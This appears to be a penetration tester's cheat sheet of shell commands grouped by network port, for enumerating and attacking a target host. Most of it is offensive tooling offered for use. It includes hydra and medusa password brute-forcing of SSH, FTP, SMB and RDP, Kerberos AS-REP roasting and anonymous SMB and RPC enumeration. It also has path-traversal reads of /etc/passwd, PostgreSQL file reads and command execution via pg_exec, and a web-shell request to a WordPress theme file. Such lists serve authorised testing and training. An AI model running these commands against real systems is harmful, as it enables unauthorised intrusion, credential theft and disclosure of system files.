### Port 445 (SMB)
smbclient -N -L //$rhost/
smbclient -N //$rhost/IPC$
nmap -p445 --script smb-protocols $rhost | grep "3.11"
nmap --script smb-vuln* -p139,445 -Pn $rhost
enum4linux-ng -A $rhost
nxc smb $rhost -u 'anonymous' -p '' --rid-brute
nxc smb $rhost -u "" -p "" --users
nxc smb $rhost -u "" -p "" --pass-pol
impacket-lookupsid anonymous@$rhost
qterminal -e "zsh -c 'hydra -I -l \$user -P ~/rockyou.txt -e nsr -t 1 \$rhost smb; exec zsh'" & disown

### Port 21 (FTP)
curl ftp://$rhost/ --user "anonymous:anonymous"
ftp anonymous@$rhost
nmap -p21 --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -Pn $rhost
qterminal -e "zsh -c 'hydra -I -l \$user -P ~/rockyou.txt -e nsr -t 1 \$rhost ftp; exec zsh'" & disown
qterminal -e "zsh -c 'medusa -u \$user -P ~/rockyou.txt -h \$rhost -M ftp; exec zsh'" & disown

### Port 2121 (FTP)
nmap -sV -p2121 --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -Pn $rhost
ftp anonymous@$rhost -P 2121
nmap --script ftp* -p2121 -Pn $rhost
qterminal -e "zsh -c 'hydra -I -l \$user -P ~/rockyou.txt -e nsr -t 1 \$rhost ftp -s 2121; exec zsh'" & disown

### Port 22 (SSH)
ssh-keyscan $rhost
qterminal -e "zsh -c 'hydra -I -l \$user -P ~/rockyou.txt -e nsr -t 1 \$rhost ssh; exec zsh'" & disown
qterminal -e "zsh -c 'hydra -I -l root -P ~/rockyou.txt -e nsr -t 1 \$rhost ssh; exec zsh'" & disown # try root
medusa -u $user -P ~/rockyou.txt -h $rhost -M ssh

### Port 135 (RPC)
rpcclient -U "" -N $rhost -c "enumdomusers"
rpcclient -U "" -N $rhost -c "querydispinfo"
rpcclient -U $shortdomain/$user -N $rhost
rpcclient -U '' -N $rhost
rpcclient -U "" -N $rhost
rpcclient -U''%'' -N $rhost

### Port 389 (LDAP)
jxplorer #389
nmap -p389 --script "ldap* and not brute" -n -Pn $rhost
Edit> ldapsearch -x -H ldap://$rhost -b "" -s base "(objectclass=*)"
Edit> ldapsearch -x -H "ldap://$rhost" -b "CN=$computer_name,DC=$shortdomain,DC=c0mmm" "objectclass=*" | grep description
Edit> ldapsearch -x -H "ldap://$rhost" -b "DC=$shortdomain,DC=c0mmm" "objectclass=*" | grep description
Edit> ldapsearch -x -H ldap://$rhost -b "dc=$shortdomain,dc=com" "(objectClass=user)"
Edit> ldapsearch -x -H ldap://$rhost -b "dc=$shortdomain,dc=com" "(objectClass=group)"
Edit> New tab plz nmap -p389 --script ldap-brute --script-args ldap.base='"cn=users,dc=$shortdomain,dc=c0mmm"' -Pn $rhost

### Port 636 (LDAPS)
# Note: No LDAPS commands were provided in the original list

### Port 88 (Kerberos)
impacket-GetNPUsers -no-pass -usersfile users.txt $domain -dc-ip $rhost
kerbrute userenum --domain $shortdomain users.txt --dc $rhost

### Port 25 (SMTP)
nmap -sV -p25 --script smtp-commands,smtp-open-relay -Pn $rhost
smtp-user-enum -U /seclists/Usernames/Names/names.txt -t $rhost -m 150
smtp-user-enum -M VRFY -w 30 -U users.txt -t $rhost -v
smtp-user-enum -M RCPT -U users.list -D $domain -t $rhost

### Port 53 (DNS)
dig $domain @$rhost
dig axfr $domain @$rhost
dig any $domain @$rhost
dig any www.$domain
dig axfr internal.$domain @$rhost
dig axfr ns1.$domain @$rhost @ns.$domain
qterminal -e "zsh -c 'for dnsname in \$(cat /usr/share/seclists/Discovery/DNS/namelist.txt); do host \$dnsname.\$domain \$rhost; done | grep \"has address\"; exec zsh'" & disown

### Port 80 (HTTP)
anyHTTP including 8080 etc
curl -s http://$rhost/robots.txt
qterminal -e "zsh -c 'ffuf -t 200 -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -v -u http://$rhost/FUZZ'" & disown
Did you try ffuf with file extensions such as php, txt, zip etc
locate admin portals etc using ffuf or google
curl -s http://$rhost | batcat -s --plain
ffuf -w /path/to/lfi-payloads.txt -u http://$rhost/page?file=FUZZ
curl "http://$rhost/file?name=../../../../etc/passwd"
open http://$rhost
cewl -d 2 -m 5 -w create_user.txt https://$rhost/
cewl -d 2 -m 5 -w create_user.txt https://$rhost/xyz-corp
wpscan --url http://$rhost/wordPressSiteLocation? -e ap,at,u --plugins-detection aggressive -t 20
curl -s http://blog.$domain/ | grep -e 'WordPress' -e 'plugins' -e 'themes'
curl -s http://blog.$domain/?p=1 | grep -e 'WordPress' -e 'plugins' -e 'themes'
curl -s http://blog.$domain/wp-content/themes/twentynineteen/404.php?0=id
cadaver http://$rhost/ITproject
cadaver http://$rhost/maybe-it-cred-requires

### Port 443 (HTTPS)
curl -k https://$rhost
sslscan $rhost:443
wafw00f -v https://$domain

### Port 1433 (MSSQL)
sqsh -S $rhost -U sa -P ""
nmap -p1433 --script ms-sql* -Pn $rhost
Edit > nmap -p1433 --script ms-sql* --script-args mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -Pn $rhost

### Port 3306 (MySQL)
mysql -u $user -h $rhost # try with no password
mysql -h $rhost -u "" -p""
nmap -sV -p3306 --script mysql* -Pn $rhost
nmap -sV -p3306 --script mysql-info,mysql-variables -Pn $rhost
nmap -sV -p3306 --script mysql-databases -Pn $rhost

### Port 5432 (PostgreSQL)
psql -h $rhost -U postgres
psql -h $rhost -U postgres -c "COPY (SELECT pg_read_file('/etc/passwd')) TO STDOUT"
psql -h $rhost -U postgres -c "COPY (SELECT pg_read_file('C:\\Windows\\win.ini')) TO STDOUT"
psql -h $rhost -U postgres -c "COPY (SELECT pg_exec('whoami')) TO STDOUT"

### Port 3389 (RDP)
qterminal -e "zsh -c 'hydra -I -l \$user -P ~/rockyou.txt -e nsr -t 1 \$rhost rdp; exec zsh'" & disown

### Port 6379 (Redis)
redis-cli -h $rhost
redis-cli -h $rhost keys *

### Port 2049 (NFS)
showmount -e $rhost
nmap --script nfs* -p111,2049 -Pn $rhost

### Port 111 (NFS)
showmount -e $rhost
nmap --script nfs* -p111,2049 -Pn $rhost

### Port 161 (SNMP)
snmpwalk -v1 -c public $rhost
qterminal -e "zsh -c 'onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt $rhost; exec zsh'" & disown

### Port 9200 (Elasticsearch)
curl -s http://$rhost:9200/_cat/indices
curl -s http://$rhost:9200/_cluster/health

### Port 27017 (MongoDB)
mongo --host $rhost --eval "db.version()"
mongo --host $rhost --eval "db.getCollectionNames()"

### Port 5984 (CouchDB)
curl -s http://$rhost:5984/_all_dbs
curl -s http://$rhost:5984/_utils/

### Port 2375 (Docker)
docker -H tcp://$rhost:2375 ps
docker -H tcp://$rhost:2375 images

### Port 623 (IPMI)
ipmitool -I lanplus -C 0 -H $rhost -U "" -P "" user list (IPMI user enumeration)
nmap -sU -p623 --script ipmi-version.nse $rhost

### Port 873 (Rsync)
rsync rsync://$rhost

### Port 5683 (CoAP)
coap-client -m get "coap://$rhost:5683/.well-known/core" 
TFTP (Port 69)
tftp $rhost → get /etc/passwd
